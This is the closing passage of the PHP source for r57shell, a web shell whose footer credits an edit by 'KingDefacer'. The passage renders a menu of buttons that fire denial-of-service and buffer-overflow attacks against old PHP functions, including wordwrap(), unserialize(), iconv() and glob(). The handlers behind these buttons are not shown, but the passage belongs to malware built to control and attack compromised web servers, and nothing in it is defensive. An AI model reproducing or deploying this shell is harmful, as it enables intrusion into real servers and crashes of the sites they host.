7680echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe);
7681
7682echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe);
7683
7684echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe);
7685
7686echo $te."</td><td valign=top width=25%>".$ts;
7687
7688echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7689
7690echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe);
7691
7692echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe);
7693
7694echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe);
7695
7696echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe);
7697
7698echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe);
7699
7700echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe);
7701
7702echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe);
7703
7704echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe);
7705
7706echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe);
7707
7708echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe);
7709
7710echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe);
7711
7712echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe);
7713
7714echo $te."</td><td valign=top width=25%>".$ts;
7715
7716echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7717
7718echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe);
7719
7720echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe);
7721
7722echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe);
7723
7724echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe);
7725
7726echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe);
7727
7728echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe);
7729
7730echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe);
7731
7732echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe);
7733
7734echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe);
7735
7736echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe);
7737
7738echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe);
7739
7740echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe);
7741
7742echo $te."</td><td valign=top width=25%>".$ts;
7743
7744echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7745
7746echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe);
7747
7748echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe);
7749
7750/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/
7751
7752echo $te."</td></tr></div></table>";
7753
7754echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell | version ".$version." | <a href=http://www.c99php.com/>r57shell v.1.42 Edited By KingDefacer</a> | Generation time: ".round(getmicrotime()-starttime,4)." ]---o</b></font></div></td></tr></table>";
7755
7756echo '</body></html>';
7757
7758?>